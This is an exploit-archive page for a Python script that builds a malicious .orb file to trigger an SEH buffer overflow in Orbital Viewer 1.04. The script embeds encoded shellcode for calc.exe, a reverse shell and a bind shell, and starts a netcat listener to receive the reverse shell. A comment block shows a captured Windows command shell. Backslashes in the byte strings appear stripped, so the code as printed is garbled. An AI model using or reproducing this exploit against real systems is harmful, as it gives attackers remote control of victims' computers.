Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit
# Published : 2010-02-26
# Author : mr_me
# Previous Title : Tod Miller Sudo 1.6.x before 1.6.9p21 and 1.7.x before 1.7.2p4
# Next Title : Mozilla Firefox v3.6 URL Spoofing Vulnerability
#!/usr/bin/python
#
################################################################
# 
# Orbital Viewer v1.04 (.orb) 0day Local Universal SEH Overflow Exploit
# Date: 27 Feb 2010
# CVE: CVE-2010-0688
# Download: http://www.orbitals.com/orb/ov.htm 
# Found & exploited by: mr_me (http://net-ninja.net)
# Greetz to: corelanc0d3r/eske/sinn3r/EdiStrosar/Rick2600/MarkoT/jnz/Redsees
# Tested on: Windows xp sp3
#
################################################################
# Bad chars: x00x0axbdx0dx20
# Here we go.. !	...all the way from Australia...
#
# [+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit
# [+] Shellcode options
#         1: calc.exe
#         2: reverse shell
#         3: bind shell
# [+] which shellcode? 2
# [+] Vulnerable file created!
# [+] Listening on port 4444...
# listening on [any] 4444 ...
# 192.168.2.55: inverse host lookup failed: Unknown server error : Connection timed out
# connect to [192.168.2.10] from (UNKNOWN) [192.168.2.55] 2222
# Microsoft Windows XP [Version 5.1.2600]
# (C) Copyright 1985-2001 Microsoft Corp.
# 
# C:Documents and SettingsSteve>
#

import sys, os

print "|------------------------------------------------------------------|"
print "|                         __               __                      |"
print "|   _________  ________  / /___ _____     / /____  ____ _____ ___  |"
print "|  / ___/ __ / ___/ _ / / __ `/ __    / __/ _ / __ `/ __ `__  |"
print "| / /__/ /_/ / /  /  __/ / /_/ / / / /  / /_/  __/ /_/ / / / / / / |"
print "| ___/____/_/   ___/_/__,_/_/ /_/   __/___/__,_/_/ /_/ /_/  |"
print "|								  |"
print "|-------------------------------------------------[ EIP Hunters ]--|"
print "[+] Orbital Viewer v1.04 (.orb) Universal SEH Overflow Exploit"

# windows/exec - 303 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, CMD=calc.exe

calc = ("xd9xf7xd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx4ax48x51x54x45x50x43x30x45x50x4cx4bx51x55"
"x47x4cx4cx4bx43x4cx43x35x43x48x43x31x4ax4fx4c"
"x4bx50x4fx44x58x4cx4bx51x4fx47x50x45x51x4ax4b"
"x50x49x4cx4bx46x54x4cx4bx43x31x4ax4ex50x31x49"
"x50x4ax39x4ex4cx4bx34x49x50x42x54x44x47x49x51"
"x49x5ax44x4dx45x51x49x52x4ax4bx4bx44x47x4bx50"
"x54x47x54x45x54x44x35x4dx35x4cx4bx51x4fx51x34"
"x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4bx51"
"x4fx45x4cx43x31x4ax4bx4cx4bx45x4cx4cx4bx43x31"
"x4ax4bx4cx49x51x4cx46x44x43x34x48x43x51x4fx50"
"x31x4ax56x43x50x50x56x42x44x4cx4bx50x46x50x30"
"x4cx4bx47x30x44x4cx4cx4bx42x50x45x4cx4ex4dx4c"
"x4bx42x48x45x58x4bx39x4ax58x4bx33x49x50x42x4a"
"x50x50x42x48x4cx30x4cx4ax44x44x51x4fx45x38x4a"
"x38x4bx4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43"
"x45x31x42x4cx43x53x46x4ex43x55x43x48x45x35x45"
"x50x41x41")

# windows/shell_reverse_tcp - 636 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# LHOST=192.168.2.10, EXITFUNC=seh, LPORT=4444

rev = ("x89xe6xdaxd8xd9x76xf4x5ex56x59x49x49x49x49x49"
"x49x49x49x49x49x43x43x43x43x43x43x37x51x5ax6a"
"x41x58x50x30x41x30x41x6bx41x41x51x32x41x42x32"
"x42x42x30x42x42x41x42x58x50x38x41x42x75x4ax49"
"x4bx4cx42x4ax4ax4bx50x4dx4bx58x4cx39x4bx4fx4b"
"x4fx4bx4fx43x50x4cx4bx42x4cx46x44x47x54x4cx4b"
"x47x35x47x4cx4cx4bx43x4cx45x55x43x48x43x31x4a"
"x4fx4cx4bx50x4fx42x38x4cx4bx51x4fx47x50x45x51"
"x4ax4bx47x39x4cx4bx47x44x4cx4bx45x51x4ax4ex50"
"x31x49x50x4ax39x4ex4cx4cx44x49x50x43x44x45x57"
"x49x51x49x5ax44x4dx45x51x49x52x4ax4bx4ax54x47"
"x4bx50x54x46x44x47x58x42x55x4bx55x4cx4bx51x4f"
"x47x54x43x31x4ax4bx42x46x4cx4bx44x4cx50x4bx4c"
"x4bx51x4fx45x4cx45x51x4ax4bx43x33x46x4cx4cx4b"
"x4bx39x42x4cx51x34x45x4cx45x31x48x43x46x51x49"
"x4bx42x44x4cx4bx50x43x50x30x4cx4bx47x30x44x4c"
"x4cx4bx44x30x45x4cx4ex4dx4cx4bx51x50x43x38x51"
"x4ex45x38x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4f"
"x48x56x45x36x46x33x43x56x45x38x46x53x46x52x43"
"x58x43x47x43x43x47x42x51x4fx46x34x4bx4fx4ex30"
"x42x48x48x4bx4ax4dx4bx4cx47x4bx50x50x4bx4fx48"
"x56x51x4fx4dx59x4dx35x43x56x4bx31x4ax4dx43x38"
"x43x32x51x45x42x4ax43x32x4bx4fx48x50x43x58x4e"
"x39x45x59x4bx45x4ex4dx46x37x4bx4fx48x56x51x43"
"x46x33x51x43x51x43x51x53x51x43x47x33x46x33x4b"
"x4fx4ex30x42x48x49x50x49x38x44x42x44x4ax42x46"
"x42x48x42x31x51x4cx42x46x46x33x4cx49x4bx51x4d"
"x45x42x48x4ax4cx4cx39x4ex4ax43x50x51x47x4bx4f"
"x48x56x42x4ax42x30x46x31x50x55x4bx4fx48x50x45"
"x36x43x5ax42x44x45x36x42x48x43x53x42x4dx43x5a"
"x50x50x46x39x47x59x48x4cx4cx49x4ax47x43x5ax47"
"x34x4cx49x4dx32x50x31x49x50x4ax53x4ex4ax4ax35"
"x4dx59x4bx4dx4bx4ex51x52x46x4dx4bx4ex50x42x46"
"x4cx4cx4dx43x4ax47x48x4ex4bx4ex4bx4ex4bx42x48"
"x44x32x4bx4ex4ex53x42x36x4bx4fx44x35x47x58x4b"
"x4fx4ex36x51x4bx46x37x50x52x50x51x50x51x50x51"
"x42x4ax45x51x46x31x50x51x46x35x46x31x4bx4fx48"
"x50x42x48x4ex4dx4ex39x44x45x48x4ex46x33x4bx4f"
"x4ex36x42x4ax4bx4fx4bx4fx47x47x4bx4fx4ex30x43"
"x58x4dx37x43x49x48x46x44x39x4bx4fx43x45x43x34"
"x4bx4fx49x46x4bx4fx42x57x4bx4cx4bx4fx4ex30x45"
"x38x4ax50x4dx5ax44x44x51x4fx51x43x4bx4fx4ex36"
"x4bx4fx4ex30x41x41")

# windows/shell_bind_tcp - 695 bytes
# http://www.metasploit.com
# Encoder: x86/alpha_mixed
# EXITFUNC=seh, LPORT=4444, RHOST=192.168.2.55

bind =("xdbxc1xd9x74x24xf4x5bx53x59x49x49x49x49x49x49"
"x49x49x49x43x43x43x43x43x43x43x37x51x5ax6ax41"
"x58x50x30x41x30x41x6bx41x41x51x32x41x42x32x42"
"x42x30x42x42x41x42x58x50x38x41x42x75x4ax49x4b"
"x4cx43x5ax4ax4bx50x4dx4ax48x4cx39x4bx4fx4bx4f"
"x4bx4fx45x30x4cx4bx42x4cx51x34x47x54x4cx4bx47"
"x35x47x4cx4cx4bx43x4cx43x35x44x38x45x51x4ax4f"
"x4cx4bx50x4fx42x38x4cx4bx51x4fx51x30x45x51x4a"
"x4bx47x39x4cx4bx47x44x4cx4bx43x31x4ax4ex50x31"
"x49x50x4dx49x4ex4cx4cx44x49x50x42x54x44x47x49"
"x51x49x5ax44x4dx45x51x48x42x4ax4bx4cx34x47x4b"
"x50x54x47x54x47x58x42x55x4dx35x4cx4bx51x4fx51"
"x34x45x51x4ax4bx42x46x4cx4bx44x4cx50x4bx4cx4b"
"x51x4fx45x4cx43x31x4ax4bx44x43x46x4cx4cx4bx4d"
"x59x42x4cx47x54x45x4cx43x51x49x53x50x31x49x4b"
"x43x54x4cx4bx51x53x46x50x4cx4bx47x30x44x4cx4c"
"x4bx42x50x45x4cx4ex4dx4cx4bx51x50x43x38x51x4e"
"x43x58x4cx4ex50x4ex44x4ex4ax4cx46x30x4bx4fx48"
"x56x45x36x50x53x42x46x43x58x47x43x46x52x42x48"
"x43x47x44x33x50x32x51x4fx46x34x4bx4fx48x50x43"
"x58x48x4bx4ax4dx4bx4cx47x4bx46x30x4bx4fx49x46"
"x51x4fx4cx49x4ax45x45x36x4dx51x4ax4dx44x48x45"
"x52x46x35x43x5ax43x32x4bx4fx48x50x42x48x49x49"
"x44x49x4cx35x4ex4dx50x57x4bx4fx4ex36x50x53x46"
"x33x46x33x46x33x51x43x50x43x50x53x47x33x50x53"
"x4bx4fx4ex30x45x36x42x48x44x51x51x4cx43x56x51"
"x43x4cx49x4bx51x4dx45x43x58x49x34x44x5ax42x50"
"x49x57x51x47x4bx4fx4ex36x42x4ax44x50x46x31x50"
"x55x4bx4fx48x50x42x48x49x34x4ex4dx46x4ex4ax49"
"x51x47x4bx4fx49x46x50x53x46x35x4bx4fx48x50x45"
"x38x4dx35x51x59x4bx36x51x59x46x37x4bx4fx4ex36"
"x46x30x46x34x51x44x51x45x4bx4fx48x50x4ax33x43"
"x58x4ax47x42x59x49x56x42x59x51x47x4bx4fx49x46"
"x46x35x4bx4fx4ex30x45x36x43x5ax45x34x43x56x42"
"x48x42x43x42x4dx4dx59x4dx35x42x4ax46x30x51x49"
"x47x59x48x4cx4dx59x4bx57x43x5ax51x54x4bx39x4a"
"x42x50x31x49x50x4bx43x4ex4ax4bx4ex51x52x46x4d"
"x4bx4ex50x42x46x4cx4dx43x4cx4dx42x5ax46x58x4e"
"x4bx4ex4bx4ex4bx45x38x42x52x4bx4ex4ex53x45x46"
"x4bx4fx43x45x47x34x4bx4fx4ex36x51x4bx46x37x50"
"x52x46x31x46x31x46x31x42x4ax43x31x46x31x46x31"
"x46x35x46x31x4bx4fx4ex30x42x48x4ex4dx48x59x45"
"x55x48x4ex46x33x4bx4fx49x46x42x4ax4bx4fx4bx4f"
"x46x57x4bx4fx4ex30x4cx4bx46x37x4bx4cx4dx53x48"
"x44x45x34x4bx4fx48x56x50x52x4bx4fx48x50x45x38"
"x4cx30x4cx4ax45x54x51x4fx46x33x4bx4fx49x46x4b"
"x4fx4ex30x41x41");

header = "x4fx72x62x69x74x61x6cx46"
header += "x69x6cx65x56x31x2ex30x0dx0a"
nops = "x90" * 1010
fly = "xe9xc8xf9xffxff"
nseh = "xebxf9x90x90"	
seh = "x50x82x45"		# partial overwrite - ppr from ov.exe

print "[+] Shellcode options"
print "t1: calc.exe"
print "t2: reverse shell"
print "t3: bind shell" 
msg = '[+] which shellcode? '
uin = raw_input(msg).strip()

if not uin:
	print "[-] You have not entered 1,2 or 3, quiting"
	sys.exit(1)
if uin == '1':
	junk = "x41" * (5045 - len(calc))
        lol = header + junk + nops + calc + fly + nseh + seh;
if uin == '2':
	junk = "x41" * (5045 - len(rev))
	lol = header + junk + nops + rev + fly + nseh + seh;
if uin == '3':
	junk = "x41" * (5045 - len(bind))
        lol = header + junk + nops + bind + fly + nseh + seh;

try:
   vulnerable = open("mr_me-owns-orbital.orb",'w')
   vulnerable.write(lol)
   vulnerable.close()
   print "[+] Vulnerable file created!"
   if uin == '2':
	print "[+] Listening on port 4444..."
	os.system("nc -lvp 4444")
except:
   print "[-] Error occured!"